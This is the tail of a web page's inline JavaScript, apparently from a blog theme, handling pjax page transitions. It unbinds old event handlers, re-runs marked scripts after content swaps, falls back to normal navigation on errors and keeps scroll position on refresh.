        var targetUrl = e.triggerElement.href;
        var banUrl = [""];
        if (banUrl[0] != "") {
          for (var n = 0; n < banUrl.length; n++) {
            var item = banUrl[n];
            var matches = currentUrl.indexOf(item) != -1 || targetUrl.indexOf(item) != -1;
            if (matches) {
              window.location.href = targetUrl;
            }
          }
        }
      } catch (error) {}

      // Drop jQuery-bound handlers of the outgoing page so they do not pile up.
      $(window).unbind('resize').unbind('scroll');
      $(document).unbind('scroll').unbind('click');
      $('body').unbind('click');

    })
    
    // Re-run scripts marked data-pjax, or placed inside .pjax-reload, by detaching
    // each one and appending it back to its parent. Any script in content swapped
    // in by pjax that matches these selectors is therefore executed.
    document.addEventListener('pjax:complete', function () {
      $('script[data-pjax], .pjax-reload script').each(function () {
        var $script = $(this);
        var $parent = $script.parent();
        $parent.append($script.remove());
      });
    });

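    // A pjax request failed: fall back to a normal navigation.
    document.addEventListener('pjax:error', function (e) {
      // If the event carries no trigger element, reading .href would throw and
      // leave the page half-updated, so reload the current URL in that case.
      var target = e.triggerElement && e.triggerElement.href;
      if (target) {
        window.location.href = target;
      } else {
        window.location.reload();
      }
    })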
    
    // 刷新不从顶部开始
    // Set history.scrollRestoration to 'auto' so a refresh does not start from the top.
    document.addEventListener("DOMContentLoaded", () => {
      history.scrollRestoration = 'auto';
    })
  </script>



  </body>
</html>